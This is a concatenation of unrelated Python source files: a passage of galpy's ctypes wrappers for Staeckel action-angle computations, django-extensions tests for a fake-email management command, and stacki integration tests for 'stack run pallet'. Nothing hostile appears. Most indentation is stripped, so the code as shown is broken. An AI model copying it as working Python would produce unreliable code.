u0= numpy.require(u0,dtype=numpy.float64,requirements=['C','W'])
#Run the C code
actionAngleStaeckel_actionsFunc(len(E),
E,
Lz,
ctypes.c_int(npot),
pot_type,
pot_args,
ctypes.c_int(ndelta),
delta,
u0,
ctypes.byref(err))
#Reset input arrays
if f_cont[0]: E= numpy.asfortranarray(E)
if f_cont[1]: Lz= numpy.asfortranarray(Lz)
if f_cont[2]: delta= numpy.asfortranarray(delta)
return (u0,err.value)
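#Hypothetical usage sketch (illustrative values; E and Lz must be arrays):
#  E= numpy.array([-1.25]); Lz= numpy.array([1.1])
#  u0, err= actionAngleStaeckel_calcu0(E, Lz, MWPotential2014, 0.45)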
def actionAngleFreqStaeckel_c(pot,delta,R,vR,vT,z,vz,u0=None,order=10):
"""
NAME:
actionAngleFreqStaeckel_c
PURPOSE:
Use C to calculate actions and frequencies
using the Staeckel approximation
INPUT:
pot - Potential or list of such instances
delta - focal length of prolate spheroidal coordinates
R, vR, vT, z, vz - coordinates (arrays)
u0= (None) if set, u0 to use
order= (10) order of Gauss-Legendre integration of the relevant integrals
OUTPUT:
(jr,jz,Omegar,Omegaphi,Omegaz,err)
jr,jz,Omegar,Omegaphi,Omegaz : array, shape (len(R))
err - non-zero if error occurred
HISTORY:
2013-08-23 - Written - Bovy (IAS)
"""
if u0 is None:
u0, dummy= bovy_coords.Rz_to_uv(R,z,delta=numpy.atleast_1d(delta))
#Parse the potential
from galpy.orbit.integrateFullOrbit import _parse_pot
npot, pot_type, pot_args= _parse_pot(pot,potforactions=True)
#Parse delta
delta= numpy.atleast_1d(delta)
ndelta= len(delta)
#Set up result arrays
jr= numpy.empty(len(R))
jz= numpy.empty(len(R))
Omegar= numpy.empty(len(R))
Omegaphi= numpy.empty(len(R))
Omegaz= numpy.empty(len(R))
err= ctypes.c_int(0)
#Set up the C code
ndarrayFlags= ('C_CONTIGUOUS','WRITEABLE')
actionAngleStaeckel_actionsFunc= _lib.actionAngleStaeckel_actionsFreqs
actionAngleStaeckel_actionsFunc.argtypes= [ctypes.c_int,
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ctypes.c_int,
ndpointer(dtype=numpy.int32,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ctypes.c_int,
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ctypes.c_int,
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ctypes.POINTER(ctypes.c_int)]
#Array requirements, first store old order
f_cont= [R.flags['F_CONTIGUOUS'],
vR.flags['F_CONTIGUOUS'],
vT.flags['F_CONTIGUOUS'],
z.flags['F_CONTIGUOUS'],
vz.flags['F_CONTIGUOUS'],
u0.flags['F_CONTIGUOUS'],
delta.flags['F_CONTIGUOUS']]
R= numpy.require(R,dtype=numpy.float64,requirements=['C','W'])
vR= numpy.require(vR,dtype=numpy.float64,requirements=['C','W'])
vT= numpy.require(vT,dtype=numpy.float64,requirements=['C','W'])
z= numpy.require(z,dtype=numpy.float64,requirements=['C','W'])
vz= numpy.require(vz,dtype=numpy.float64,requirements=['C','W'])
u0= numpy.require(u0,dtype=numpy.float64,requirements=['C','W'])
delta= numpy.require(delta,dtype=numpy.float64,requirements=['C','W'])
jr= numpy.require(jr,dtype=numpy.float64,requirements=['C','W'])
jz= numpy.require(jz,dtype=numpy.float64,requirements=['C','W'])
Omegar= numpy.require(Omegar,dtype=numpy.float64,requirements=['C','W'])
Omegaphi= numpy.require(Omegaphi,dtype=numpy.float64,
requirements=['C','W'])
Omegaz= numpy.require(Omegaz,dtype=numpy.float64,requirements=['C','W'])
#Run the C code
actionAngleStaeckel_actionsFunc(len(R),
R,
vR,
vT,
z,
vz,
u0,
ctypes.c_int(npot),
pot_type,
pot_args,
ctypes.c_int(ndelta),
delta,
ctypes.c_int(order),
jr,
jz,
Omegar,
Omegaphi,
Omegaz,
ctypes.byref(err))
#Reset input arrays
if f_cont[0]: R= numpy.asfortranarray(R)
if f_cont[1]: vR= numpy.asfortranarray(vR)
if f_cont[2]: vT= numpy.asfortranarray(vT)
if f_cont[3]: z= numpy.asfortranarray(z)
if f_cont[4]: vz= numpy.asfortranarray(vz)
if f_cont[5]: u0= numpy.asfortranarray(u0)
if f_cont[6]: delta= numpy.asfortranarray(delta)
return (jr,jz,Omegar,Omegaphi,Omegaz,err.value)
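#Hypothetical usage sketch: same inputs as actionAngleStaeckel_c, with the
#radial, azimuthal, and vertical frequencies returned as well:
#  jr, jz, Or, Op, Oz, err= actionAngleFreqStaeckel_c(MWPotential2014, 0.45,
#                                                     R, vR, vT, z, vz)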
def actionAngleFreqAngleStaeckel_c(pot,delta,R,vR,vT,z,vz,phi,
u0=None,order=10):
"""
NAME:
actionAngleFreqAngleStaeckel_c
PURPOSE:
Use C to calculate actions, frequencies, and angles
using the Staeckel approximation
INPUT:
pot - Potential or list of such instances
delta - focal length of prolate spheroidal coordinates
R, vR, vT, z, vz, phi - coordinates (arrays)
u0= (None) if set, u0 to use
order= (10) order of Gauss-Legendre integration of the relevant integrals
OUTPUT:
(jr,jz,Omegar,Omegaphi,Omegaz,Angler,Anglephi,Anglez,err)
jr,jz,Omegar,Omegaphi,Omegaz,Angler,Anglephi,Anglez : array, shape (len(R))
err - non-zero if error occurred
HISTORY:
2013-08-27 - Written - Bovy (IAS)
"""
if u0 is None:
u0, dummy= bovy_coords.Rz_to_uv(R,z,delta=numpy.atleast_1d(delta))
#Parse the potential
from galpy.orbit.integrateFullOrbit import _parse_pot
npot, pot_type, pot_args= _parse_pot(pot,potforactions=True)
#Parse delta
delta= numpy.atleast_1d(delta)
ndelta= len(delta)
#Set up result arrays
jr= numpy.empty(len(R))
jz= numpy.empty(len(R))
Omegar= numpy.empty(len(R))
Omegaphi= numpy.empty(len(R))
Omegaz= numpy.empty(len(R))
Angler= numpy.empty(len(R))
Anglephi= numpy.empty(len(R))
Anglez= numpy.empty(len(R))
err= ctypes.c_int(0)
#Set up the C code
ndarrayFlags= ('C_CONTIGUOUS','WRITEABLE')
actionAngleStaeckel_actionsFunc= _lib.actionAngleStaeckel_actionsFreqsAngles
actionAngleStaeckel_actionsFunc.argtypes= [ctypes.c_int,
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ctypes.c_int,
ndpointer(dtype=numpy.int32,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ctypes.c_int,
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ctypes.c_int,
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ctypes.POINTER(ctypes.c_int)]
#Array requirements, first store old order
f_cont= [R.flags['F_CONTIGUOUS'],
vR.flags['F_CONTIGUOUS'],
vT.flags['F_CONTIGUOUS'],
z.flags['F_CONTIGUOUS'],
vz.flags['F_CONTIGUOUS'],
u0.flags['F_CONTIGUOUS'],
delta.flags['F_CONTIGUOUS']]
R= numpy.require(R,dtype=numpy.float64,requirements=['C','W'])
vR= numpy.require(vR,dtype=numpy.float64,requirements=['C','W'])
vT= numpy.require(vT,dtype=numpy.float64,requirements=['C','W'])
z= numpy.require(z,dtype=numpy.float64,requirements=['C','W'])
vz= numpy.require(vz,dtype=numpy.float64,requirements=['C','W'])
u0= numpy.require(u0,dtype=numpy.float64,requirements=['C','W'])
delta= numpy.require(delta,dtype=numpy.float64,requirements=['C','W'])
jr= numpy.require(jr,dtype=numpy.float64,requirements=['C','W'])
jz= numpy.require(jz,dtype=numpy.float64,requirements=['C','W'])
Omegar= numpy.require(Omegar,dtype=numpy.float64,requirements=['C','W'])
Omegaphi= numpy.require(Omegaphi,dtype=numpy.float64,
requirements=['C','W'])
Omegaz= numpy.require(Omegaz,dtype=numpy.float64,requirements=['C','W'])
Angler= numpy.require(Angler,dtype=numpy.float64,requirements=['C','W'])
Anglephi= numpy.require(Anglephi,dtype=numpy.float64,
requirements=['C','W'])
Anglez= numpy.require(Anglez,dtype=numpy.float64,requirements=['C','W'])
#Run the C code
actionAngleStaeckel_actionsFunc(len(R),
R,
vR,
vT,
z,
vz,
u0,
ctypes.c_int(npot),
pot_type,
pot_args,
ctypes.c_int(ndelta),
delta,
ctypes.c_int(order),
jr,
jz,
Omegar,
Omegaphi,
Omegaz,
Angler,
Anglephi,
Anglez,
ctypes.byref(err))
#Reset input arrays
if f_cont[0]: R= numpy.asfortranarray(R)
if f_cont[1]: vR= numpy.asfortranarray(vR)
if f_cont[2]: vT= numpy.asfortranarray(vT)
if f_cont[3]: z= numpy.asfortranarray(z)
if f_cont[4]: vz= numpy.asfortranarray(vz)
if f_cont[5]: u0= numpy.asfortranarray(u0)
if f_cont[6]: delta= numpy.asfortranarray(delta)
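#Fold the azimuth into the phi angle and wrap to [0,2pi); 9999.99 appears to be
#the C code's sentinel for angles it could not compute, so those entries are skipped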
badAngle = Anglephi != 9999.99
Anglephi[badAngle]= (Anglephi[badAngle] + phi[badAngle] % (2.*numpy.pi)) % (2.*numpy.pi)
Anglephi[Anglephi < 0.]+= 2.*numpy.pi
return (jr,jz,Omegar,Omegaphi,Omegaz,Angler,
Anglephi,Anglez,err.value)
def actionAngleUminUmaxVminStaeckel_c(pot,delta,R,vR,vT,z,vz,u0=None):
"""
NAME:
actionAngleUminUmaxVminStaeckel_c
PURPOSE:
Use C to calculate umin, umax, and vmin using the Staeckel approximation
INPUT:
pot - Potential or list of such instances
delta - focal length of prolate spheroidal coordinates
R, vR, vT, z, vz - coordinates (arrays)
u0= (None) if set, u0 to use
OUTPUT:
(umin,umax,vmin,err)
umin,umax,vmin : array, shape (len(R))
err - non-zero if error occurred
HISTORY:
2017-12-12 - Written - Bovy (UofT)
"""
if u0 is None:
u0, dummy= bovy_coords.Rz_to_uv(R,z,delta=numpy.atleast_1d(delta))
#Parse the potential
from galpy.orbit.integrateFullOrbit import _parse_pot
npot, pot_type, pot_args= _parse_pot(pot,potforactions=True)
#Parse delta
delta= numpy.atleast_1d(delta)
ndelta= len(delta)
#Set up result arrays
umin= numpy.empty(len(R))
umax= numpy.empty(len(R))
vmin= numpy.empty(len(R))
err= ctypes.c_int(0)
#Set up the C code
ndarrayFlags= ('C_CONTIGUOUS','WRITEABLE')
actionAngleStaeckel_actionsFunc= _lib.actionAngleStaeckel_uminUmaxVmin
actionAngleStaeckel_actionsFunc.argtypes= [ctypes.c_int,
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ctypes.c_int,
ndpointer(dtype=numpy.int32,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ctypes.c_int,
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ctypes.POINTER(ctypes.c_int)]
#Array requirements, first store old order
f_cont= [R.flags['F_CONTIGUOUS'],
vR.flags['F_CONTIGUOUS'],
vT.flags['F_CONTIGUOUS'],
z.flags['F_CONTIGUOUS'],
vz.flags['F_CONTIGUOUS'],
u0.flags['F_CONTIGUOUS'],
delta.flags['F_CONTIGUOUS']]
R= numpy.require(R,dtype=numpy.float64,requirements=['C','W'])
vR= numpy.require(vR,dtype=numpy.float64,requirements=['C','W'])
vT= numpy.require(vT,dtype=numpy.float64,requirements=['C','W'])
z= numpy.require(z,dtype=numpy.float64,requirements=['C','W'])
vz= numpy.require(vz,dtype=numpy.float64,requirements=['C','W'])
u0= numpy.require(u0,dtype=numpy.float64,requirements=['C','W'])
delta= numpy.require(delta,dtype=numpy.float64,requirements=['C','W'])
umin= numpy.require(umin,dtype=numpy.float64,requirements=['C','W'])
umax= numpy.require(umax,dtype=numpy.float64,requirements=['C','W'])
vmin= numpy.require(vmin,dtype=numpy.float64,requirements=['C','W'])
#Run the C code
actionAngleStaeckel_actionsFunc(len(R),
R,
vR,
vT,
z,
vz,
u0,
ctypes.c_int(npot),
pot_type,
pot_args,
ctypes.c_int(ndelta),
delta,
umin,
umax,
vmin,
ctypes.byref(err))
#Reset input arrays
if f_cont[0]: R= numpy.asfortranarray(R)
if f_cont[1]: vR= numpy.asfortranarray(vR)
if f_cont[2]: vT= numpy.asfortranarray(vT)
if f_cont[3]: z= numpy.asfortranarray(z)
if f_cont[4]: vz= numpy.asfortranarray(vz)
if f_cont[5]: u0= numpy.asfortranarray(u0)
if f_cont[6]: delta= numpy.asfortranarray(delta)
return (umin,umax,vmin,err.value)
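#Illustrative usage sketch (not part of galpy): computing umin, umax, and
#vmin for two phase-space points in the built-in MWPotential2014 with a
#typical focal length delta=0.45; assumes the compiled C extension loaded
#as _lib above is available
def _example_uminUmaxVmin_sketch():
    from galpy.potential import MWPotential2014
    R= numpy.array([1.,1.1]); vR= numpy.zeros(2); vT= numpy.ones(2)
    z= numpy.array([0.,0.1]); vz= numpy.zeros(2)
    return actionAngleUminUmaxVminStaeckel_c(MWPotential2014,0.45,
                                             R,vR,vT,z,vz)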
13dced776a9ba6618afd87965a36b4b0ebc5ae16 | 4,998 | py | Python | tests/management/commands/test_set_fake_emails.py | Ardenine/django-extensions | 8fe05a73e9e09e8fe3206f4b5044bd7b3bad4f7c | ["MIT"]
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.core.management import call_command, CommandError
from django.contrib.auth.models import User
from django.utils.six import StringIO
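# NOTE: django.utils.six was removed in Django 3.0; on newer Django,
# import StringIO from the standard library's io module instead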
from django_extensions.management.commands.set_fake_emails import Command
import pytest
@pytest.fixture(scope='module') # noqa
def django_db_setup(django_db_setup, django_db_blocker): # noqa
"""Load to database a set of users, create for export
emails command testing"""
with django_db_blocker.unblock(): # noqa
call_command('loaddata', 'group.json')
call_command('loaddata', 'user.json')
@pytest.mark.django_db()
def test_without_args(capsys, settings):
settings.DEBUG = True
emails = User.objects.values_list('email', flat=True)
assert all(email.endswith("@gmail.com") for email in emails)
generate_password = Command()
generate_password.run_from_argv(['manage.py', 'set_fake_emails'])
out, err = capsys.readouterr()
assert 'Changed 3 emails' in out
emails = User.objects.values_list('email', flat=True)
assert all(email.endswith("@example.com") for email in emails)
@pytest.mark.django_db()
def test_no_admin(capsys, settings):
settings.DEBUG = True
emails = User.objects.values_list('email', flat=True)
assert all(email.endswith("@gmail.com") for email in emails)
generate_password = Command()
generate_password.run_from_argv(['manage.py', 'set_fake_emails', '-a'])
out, err = capsys.readouterr()
assert 'Changed 2 emails' in out
emails = User.objects.filter(is_superuser=False).values_list('email', flat=True)
assert all(email.endswith("@example.com") for email in emails)
emails = User.objects.filter(is_superuser=True).values_list('email', flat=True)
assert all(email.endswith("@gmail.com") for email in emails)
@pytest.mark.django_db()
def test_include_groups(capsys, settings):
settings.DEBUG = True
emails = User.objects.values_list('email', flat=True)
assert all(email.endswith("@gmail.com") for email in emails)
generate_password = Command()
generate_password.run_from_argv(['manage.py', 'set_fake_emails', '--include-groups=Attendees'])
out, err = capsys.readouterr()
assert 'Changed 2 emails' in out
emails = User.objects.filter(is_superuser=False).values_list('email', flat=True)
assert all(email.endswith("@example.com") for email in emails)
emails = User.objects.filter(is_superuser=True).values_list('email', flat=True)
assert all(email.endswith("@gmail.com") for email in emails)
@pytest.mark.django_db()
def test_exclude_groups(capsys, settings):
settings.DEBUG = True
emails = User.objects.values_list('email', flat=True)
assert all(email.endswith("@gmail.com") for email in emails)
generate_password = Command()
generate_password.run_from_argv(['manage.py', 'set_fake_emails', '--exclude-groups=Attendees'])
out, err = capsys.readouterr()
assert 'Changed 1 emails' in out
emails = User.objects.filter(is_superuser=False).values_list('email', flat=True)
assert all(email.endswith("@gmail.com") for email in emails)
emails = User.objects.filter(is_superuser=True).values_list('email', flat=True)
assert all(email.endswith("@example.com") for email in emails)
@pytest.mark.django_db()
def test_include_regexp(capsys, settings):
settings.DEBUG = True
emails = User.objects.values_list('email', flat=True)
assert all(email.endswith("@gmail.com") for email in emails)
generate_password = Command()
generate_password.run_from_argv(['manage.py', 'set_fake_emails', '--include=.*briel'])
out, err = capsys.readouterr()
assert 'Changed 1 emails' in out
emails = User.objects.exclude(username="Gabriel").values_list('email', flat=True)
assert all(email.endswith("@gmail.com") for email in emails)
emails = User.objects.filter(username="Gabriel").values_list('email', flat=True)
assert all(email.endswith("@example.com") for email in emails)
@pytest.mark.django_db()
def test_exclude_regexp(capsys, settings):
settings.DEBUG = True
emails = User.objects.values_list('email', flat=True)
assert all(email.endswith("@gmail.com") for email in emails)
generate_password = Command()
generate_password.run_from_argv(['manage.py', 'set_fake_emails', '--exclude=.*briel'])
out, err = capsys.readouterr()
assert 'Changed 2 emails' in out
emails = User.objects.filter(username="Gabriel").values_list('email', flat=True)
assert all(email.endswith("@gmail.com") for email in emails)
emails = User.objects.exclude(username="Gabriel").values_list('email', flat=True)
assert all(email.endswith("@example.com") for email in emails)
def test_without_debug(settings):
settings.DEBUG = False
out = StringIO()
    with pytest.raises(CommandError, match="Only available in debug mode"):
call_command('set_fake_emails', verbosity=3, stdout=out, stderr=out)
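# Sketch (not part of the original suite): the command can also be driven
# through call_command with an explicit stdout, which avoids run_from_argv
# and capsys; the '--no-admin' long form of the -a flag is assumed here
def _example_call_command_sketch():
    out = StringIO()
    call_command('set_fake_emails', '--no-admin', stdout=out)
    return out.getvalue()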
13e3bdab2e90d8d5550c3b9242e53aa1246fcb89 | 3,948 | py | Python | test-framework/test-suites/integration/tests/run/test_run_pallet.py | knutsonchris/stacki | 33087dd5fa311984a66ccecfeee6f9c2c25f665d | ["BSD-3-Clause"]
import json
from textwrap import dedent
class TestRunPallet:
def test_invalid_pallet(self, host):
result = host.run('stack run pallet test')
assert result.rc == 255
assert result.stderr == dedent('''\
error - "test" argument is not a valid pallet
{pallet ...} [arch=string] [os=string] [release=string] [version=string]
''')
def test_no_args(self, host):
result = host.run('stack run pallet')
assert result.rc == 255
assert result.stderr == dedent('''\
error - "pallet" argument is required
{pallet ...} [arch=string] [os=string] [release=string] [version=string]
''')
def test_not_enabled(self, host, host_os, create_pallet_isos, revert_export_stack_pallets):
# Add our test pallet
result = host.run(
f'stack add pallet {create_pallet_isos}/minimal-1.0-sles12.x86_64.disk1.iso'
)
assert result.rc == 0
# Make sure we get an error that the pallet isn't enabled
		result = host.run('stack run pallet minimal')
assert result.rc == 255
assert result.stderr == 'error - minimal is not enabled for the frontend\n'
def test_one_arg(self, host, revert_export_stack_carts):
# Make sure the top of the output matches what we expect
result = host.run('script -qfec "stack run pallet stacki" - | tr -d "\r" | head -n 1')
assert result.rc == 0
assert result.stdout == '#! /bin/bash\n'
# Note: The code has a test for isatty so we have to trick the
# run pallet command to think it has a tty
# Run it through "bash -n" to do a syntax sanity check
result = host.run('script -qfec "stack run pallet stacki" - | tr -d "\r" | bash -n')
assert result.rc == 0
assert result.stdout == ''
def test_multiple_args(self, host, host_os, create_pallet_isos, revert_etc, revert_export_stack_pallets, revert_export_stack_carts):
# Add our test pallet
result = host.run(
f'stack add pallet {create_pallet_isos}/test_1-{host_os}-1.0-prod.x86_64.disk1.iso'
)
assert result.rc == 0
# Add the pallet to the default box
result = host.run(f'stack enable pallet test_1-{host_os}')
assert result.rc == 0
# Note: The code has a test for isatty so we have to trick the
# run pallet command to think it has a tty
# Make sure the top of the output matches what we expect
result = host.run(f'script -qfec "stack run pallet stacki test_1-{host_os}" - | tr -d "\r" | head -n 1')
assert result.rc == 0
assert result.stdout == '#! /bin/bash\n'
# Run it through "bash -n" to do a syntax sanity check
result = host.run(f'script -qfec "stack run pallet stacki test_1-{host_os}" - | tr -d "\r" | bash -n')
assert result.rc == 0
assert result.stdout == ''
def test_database_false(self, host, host_os, create_pallet_isos, revert_etc, revert_export_stack_pallets, revert_export_stack_carts):
# Add our test pallet
result = host.run(
f'stack add pallet {create_pallet_isos}/test_1-{host_os}-1.0-prod.x86_64.disk1.iso'
)
assert result.rc == 0
# Add the pallet to the default box
result = host.run(f'stack enable pallet test_1-{host_os}')
assert result.rc == 0
# Note: The code has a test for isatty so we have to trick the
# run pallet command to think it has a tty
# Make sure the top of the output matches what we expect
result = host.run(f'script -qfec "stack run pallet stacki test_1-{host_os} database=false" - | tr -d "\r" | head -n 1')
assert result.rc == 0
assert result.stdout == '#! /bin/bash\n'
# Run it through "bash -n" to do a syntax sanity check
result = host.run(f'script -qfec "stack run pallet stacki test_1-{host_os} database=false" - | tr -d "\r" | bash -n')
assert result.rc == 0
assert result.stdout == ''
def test_no_tty_xml_error(self, host, host_os):
# Run the command, passing false for database to skip the pallet
# check and feed it bad XML
result = host.run('echo "test" | stack run pallet database=false')
assert result.rc == 0
assert result.stderr == 'error - OS name not specified in profile\n'
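# Sketch (not part of the original suite): a helper capturing the fake-TTY
# pattern used in the tests above; `script -qfec` runs the command under a
# pseudo-terminal so its isatty() check passes, and tr strips the carriage
# returns that script inserts (assumes cmd contains no double quotes)
def run_with_tty(host, cmd):
	return host.run(f'script -qfec "{cmd}" - | tr -d "\r"')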